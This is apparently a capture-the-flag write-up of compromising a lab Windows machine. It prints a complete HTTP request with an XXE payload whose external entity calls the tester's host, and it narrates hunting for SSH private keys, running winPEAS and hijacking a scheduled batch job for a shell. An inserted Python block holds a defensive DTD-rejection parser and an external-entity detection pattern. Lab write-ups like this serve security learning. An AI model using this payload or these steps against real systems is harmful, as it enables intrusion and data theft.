After going back to the login page, I tried a few default credentials and one trivial combination worked.
And then I found this simple XXE:
Request code:
POST /process.php HTTP/1.1
Host: 10.129.95.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Content-Length: 197
Origin: http://10.129.95.192
Connection: close
Referer: http://10.129.95.192/services.php
Cookie: PHPSESSID=ha5v7v3on5641j741b5pf9nheb
<?xml version = "1.0"?>
<!DOCTYPE order [
<!ENTITY xxe SYSTEM "http://10.10.14.25:8000/funny.txt">]>
<order>
&xxe;
<quantity>
1
</quantity><item>Groceries</item><address>'`</address></order>
XXE resources:
https://portswigger.net/web-security/xxe/
https://portswigger.net/web-security/xxe/blind
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
If a correct request is sent, I cannot see the output.
I was struggling a little bit (especially with “/” and “\”). After I figured out the correct syntax, I found this:
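Added example (not code from the original post): how the receiving endpoint could refuse a body like the request above before the entity is ever resolved, plus a triage helper for raw request bodies in logs or a WAF. It assumes the order document has no legitimate need for a DTD; the element names and the XXE body are taken from the request above, the benign order is constructed.

```python
import re
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD and therefore may define entities."""


def reject_doctype(data: bytes) -> None:
    """First pass: scan with expat and abort as soon as a DOCTYPE appears.

    Raising inside the handler stops expat before any entity reference is
    processed, so nothing is fetched from disk or the network.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{name}' not allowed "
                        f"(internal subset: {bool(has_internal_subset)})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_order(data: bytes) -> dict:
    """Second pass: with no DTD possible, parse normally and extract the fields."""
    reject_doctype(data)
    root = ET.fromstring(data)
    if root.tag != "order":
        raise ValueError(f"unexpected root element <{root.tag}>")
    return {child.tag: (child.text or "").strip() for child in root}


# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri">.
EXTERNAL_ENTITY = re.compile(
    rb'<!ENTITY\s+(\S+)\s+(SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"([^"]*)"', re.I)


def xxe_indicators(body: bytes) -> list:
    """Triage helper: (entity name, external URI) pairs found in a raw request body."""
    return [(m.group(1).decode(), m.group(3).decode())
            for m in EXTERNAL_ENTITY.finditer(body)]


# Body of the request shown above (from the post) and a constructed benign order.
SAMPLE_XXE_BODY = (b'<?xml version = "1.0"?>\n<!DOCTYPE order [\n'
                   b'<!ENTITY xxe SYSTEM "http://10.10.14.25:8000/funny.txt">]>\n'
                   b'<order>\n&xxe;\n<quantity>\n1\n</quantity>'
                   b"<item>Groceries</item><address>'`</address></order>")
SAMPLE_ORDER = b"<order><quantity>1</quantity><item>Groceries</item><address>x</address></order>"
```

Running parse_order on SAMPLE_XXE_BODY raises UnsafeXML at the DOCTYPE, while SAMPLE_ORDER parses into a plain dict; xxe_indicators on the request body reports the xxe entity and its URI for the incident record.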
Now I can enumerate the whole system and read files, but it would be really time consuming. I went back to check the web server to get some information about the site.
The SSH service is online, so I checked for the presence of an SSH private key:
Switched to PowerShell and ran winPEAS.
Probably AV blocked winPEAS, so I started to check the system manually.
We can see a wevtutil process, which was mentioned inside job.bat. If we consider the name of the file, it may be a scheduled task that runs this file.
After a few seconds I received a shell.